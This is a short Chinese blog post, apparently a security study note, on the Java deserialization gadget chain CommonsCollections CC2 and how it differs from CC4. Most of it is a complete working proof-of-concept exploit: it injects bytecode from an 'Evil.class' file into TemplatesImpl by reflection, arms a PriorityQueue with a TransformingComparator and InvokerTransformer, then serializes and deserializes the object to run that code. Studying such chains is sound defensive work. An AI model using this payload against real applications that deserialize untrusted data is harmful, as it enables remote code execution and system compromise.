Java反序列化CommonsCollections篇CC2

CC2链跟CC4链几乎一样,就是在CC4利用InstantiateTransformer类的基础上改成了直接使用InvokerTransformer,其他没变。

CC4:  
Transformer[] transformers = new Transformer[]{  
new ConstantTransformer(TrAXFilter.class),  
new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})  
};  
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

CC2:  
InvokerTransformer<Object,Object> invokerTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});

调用链

完整代码

package com.LE0;  
  
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;  
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;  
import org.apache.commons.collections4.Transformer;  
import org.apache.commons.collections4.comparators.TransformingComparator;  
import org.apache.commons.collections4.functors.ChainedTransformer;  
import org.apache.commons.collections4.functors.ConstantTransformer;  
import org.apache.commons.collections4.functors.InstantiateTransformer;  
import org.apache.commons.collections4.functors.InvokerTransformer;  
  
import javax.xml.transform.Templates;  
import java.io.IOException;  
import java.io.ObjectInputStream;  
import java.io.ObjectOutputStream;  
import java.lang.reflect.Field;  
import java.nio.file.Files;  
import java.nio.file.Paths;  
import java.util.PriorityQueue;  
  
public class CC2 {  
    public static void main(String[] args) throws Exception {  
        TemplatesImpl templates = new TemplatesImpl();  
  
        Class tc = templates.getClass();  
        Field name = tc.getDeclaredField("_name");  
        name.setAccessible(true);  
        name.set(templates,"LE0");  
        Field bytecodes = tc.getDeclaredField("_bytecodes");  
        bytecodes.setAccessible(true);  
  
        byte[] code = Files.readAllBytes(Paths.get("D:\\code\\java\\Evil.class"));  
        byte[][] codes= {code};  
        bytecodes.set(templates,codes);  
  
  
        InvokerTransformer<Object,Object> invokerTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});  
  
        TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));  
        PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);  
  
  
        priorityQueue.add(templates);  
        priorityQueue.add(2);  
  
        Class t = transformingComparator.getClass();  
        Field transformerField = t.getDeclaredField("transformer");  
        transformerField.setAccessible(true);  
        transformerField.set(transformingComparator,invokerTransformer);  
  
        serialize(priorityQueue);  
        deserialize("ser.bin");  
    }  
    public static void serialize(Object obj) throws IOException {  
        ObjectOutputStream oos = new ObjectOutputStream(Files.newOutputStream(Paths.get("ser.bin")));  
        oos.writeObject(obj);  
    }  
  
    public static Object deserialize(String filename) throws IOException, ClassNotFoundException {  
        ObjectInputStream ois = new ObjectInputStream(Files.newInputStream(Paths.get(filename)));  
        return ois.readObject();  
    }  
}
posted @ 2026-02-13 12:08  leee0  阅读(2)  评论(0)    收藏  举报